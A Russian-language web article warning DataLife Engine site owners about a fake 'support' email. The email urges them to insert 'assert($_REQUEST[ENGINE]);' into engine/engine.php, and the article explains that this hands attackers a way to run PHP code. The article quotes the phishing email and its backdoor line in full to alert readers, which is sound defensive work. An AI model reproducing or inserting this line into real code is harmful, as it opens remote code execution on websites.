Возможно, это заинтересует:


    Рекомендуем:
Недавно на сайте смотрели:


    Как хранить аккумулятор, чтобы сохранить его от «ранней смерти» На аккумулятор ноутбука влияет много факторов: температура, влажность, частые циклы разрядки/зарядки. Если ваш ноутбук замена настольному компьютеру, то вам, ...
    Критерии выбора ноутбука Большое количество специальных компьютерных магазинов и специализированных отделов в гипермаркетах торгующих бытовой техникой способны привести любого человека ...
    Использование языка JavaScript С помощью Java Script можно создавать скрипты, причем выполнять это можно, не затрачивая особых сил и навыков. Электронную страницу JS может превратить в ...
    Выбор ноутбука с процессором Intel В последние годы ноутбуки стали очень актуальны. А всё благодаря тому, что они компактны, и их повсюду можно за собой таскать. Особенно большую популярность ...
    Заработок на видеохостингах в Интернете Для того, чтоб зарабатывать на видеохостинге, свой сайт иметь совсем не обязательно, но в если вы хотите, чтоб заработок был действительно существенным - он ...
2 059

DLE: Сообщение с темой "Ваш сайт **** может быть взломан!"





DLE Сообщение с темой Несомненно, движок DataLife Engine является весьма популярным среди владельцев разнонаправленных Интернет-ресурсов. В последние годы внимание к нему становится все выше, выходят новые версии, дополнения и модули для ДЛЕ. Это все привлекает и нехороших людей, проще говоря - мошенников. С одним из таких случаев, недавно смогли столкнуться многие обладатели ресурсов на этой системе управления.




Ваш DLE-сайт может быть взломан



Наверняка, некоторые владельцы сайтов на популярной CMS DLE уже столкнулись с подобным сообщением на почту:

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте ***** нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: *****/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_REQUEST[ENGINE]);

С уважением,
Служба поддержки «DataLife Engine»


Что делать вебмастеру?


Однако, в целях реальной безопасности Вашего сайта крайне не рекомендуется следовать совету из этого сообщения, так как ничего общего с разработчиками DLE оно не имеет и рассылается не ими, а злоумышленниками, которые постредством подобной манипуляции могут навредить (мягко говоря) работе ресурса. Так, используя полученную уязвимость, с помощью PHP-сценария может формироваться POST-пакет для последующей возможной отправки файла с некоторым PHP-кодом. Ну а дальше уже дело фантазии.

Кроме того, стоит иметь ввиду, что подобные сообщения отправляются посредством обратной связи на сайте и по адресам электронной почты, не имеющим никакого отношения к адресам, на которые зарегистрированы лицензионные копии ДЛЕ на сайте разработчика. При отправке письма используются проксовые айпи адреса, либо TOR.

Если у Вас все-таки возникли обоснованные сомнения по поводу безопасности Вашего сайта на ДЛЕ, то:

1. Если используется нулль-версия, рассмотрите вариант перехода на лицензию.

2. Если первый вариант не подходит, обновите вашу CMS DataLife Engine до последней актуальной версии. Разработчики постоянно занимаются модернизацией и усовершенствованием этого движка, в том числе и в плане безопасности.

3. Все выявленные уязвимости DLE и выпущенные баг-фиксы размещаются на странице официального сайта CMS DataLife Engine. Отслеживайте эту информацию именно там.


Будьте внимательны, чтобы лишний раз не давать возможностей для взлома Вашего сайта.

Теги: Ваш сайт может быть взломан

Возможно, Вас заинтересуют похожие тематические статьи и рекомендации:

  • Как выбрать хостинговую компанию для joomla 3.0На сегодняшний день, существует большое количество хостинговых компаний, предлагающих хостинг для joomla. Поэтому, многие владельцы сайтов, сталкиваются с проблемой выбора хостинг - провайдера. Для
  • 7 расширений для браузеров и программы безопасности ПККак приятно проводить время в сети Интернет: тут и приятное общение, тут и интересные новости, тут и масса полезной и нужной информации. Но в пользовании Сетью есть и свои, негативные стороны:
  • Создание сайтов: как это происходит?В наше время становится всё больше сайтов. Да, каждый день появляется масса новых проектов, каждый из которых чем-то похож друг на друга. Уже давно кануло в небытие то время, когда появлялись свежие
  • Невинных посетителей сайта обманом втянули в ДДОС-атакуИсследователи обнаружили новую атаку на отказ в обслуживании, применявшую невиданную ранее технику, чтобы тайком заставить тысячи обычных пользователей интернета бомбить цель огромным количеством
  • Как запустить сайт на СВОЁМ компьютере?Чтобы работать разработчиком сайтов, просто необходимо, прежде чем загрузить файлы на веб-сервер, поработать со своим шаблоном. Что нужно, чтобы запустить сайт локально? Подобному вопросу посвящено
  • Новая уязвимость в Internet ExplorerАвторитетный новостной портал Professional FireEye сообщил, что компьютерные системы довольно большого количества жертв новой уязвимости в популярном браузере Internet Explorer были инфицированы
  • Некоторые виды заработка в ИнтернетеПопробуем в данной статье выделить некоторые виды заработка в Интернете, способные принести реальный денежный доход. Если смотреть с самого начала пути человека, который собирается зарабатывать в
  • Способы монетизации сайтов-сателлитовСуществуют сателлиты, которые предназначены для заработка, или же поддерживающие основной проект. В случае, если Вы решили зарабатывать именно на сателлитах, Вам необходимо узнать, каким образом
  • Заработок на файлообменникахВ связи с тем, что постоянно происходит увеличение скорости доступа к просторам Интернета, появились возможности обмениваться между собой какими-либо файлами. Обмениваться можно как крупными файлами,
  • Смотрим любые фильмы в 3DКак смотреть фильмы, а так же видео в формате 3D? Для этого нам понадобится KMPlayer, скачать который вы можете по ссылке в конце статьи. Так же нам понадобится фильтр для KMPlayer, что бы мы смогли

Темы, отмеченные пользователями:

7 самых бесполезных переносных устройств-гаджетов
Среди переносных электронных устройств – т.н. гаджетов – из всех этих миллионов и миллиардов нужных и полезных «штучек» существует тонкая прослойка совершенно бесполезных устройств, которые могут пригодиться разве что для розыгрыша друга или тупого подарка на день рождения. Среди всей этой массы

Как включить и настроить iMessage на iPhone и iPad
iMessage – это услуга корпорации Apple для передачи моментальными сообщениями. В отличие от SMS, за информацию переданную iMessage не берется плата с юзера. С их помощью возможно переписываться со своими знакомыми, у каких есть хоть какое устройство от знаменитой компании Apple. Для передачи

Nexus 6: новый флагман Google
Как-то скромненько и, можно сказать, втихую прошла недавно презентация нового флагманского смартфона от Google – модели Nexus 6. Как и предполагалось ранее, Nexus 6 собирала компания Motorola и поэтому стали ясны проявления дизайна смартфонов компании в новом творении для Google. С первого взгляда

Добавить комментарий

Имя:*
E-Mail:
Комментарий:
Вопрос:
Сколько будет: 5 плюс 10 ? Ответ цифрой.
Ответ:*
Введите то, что показано на изображении: *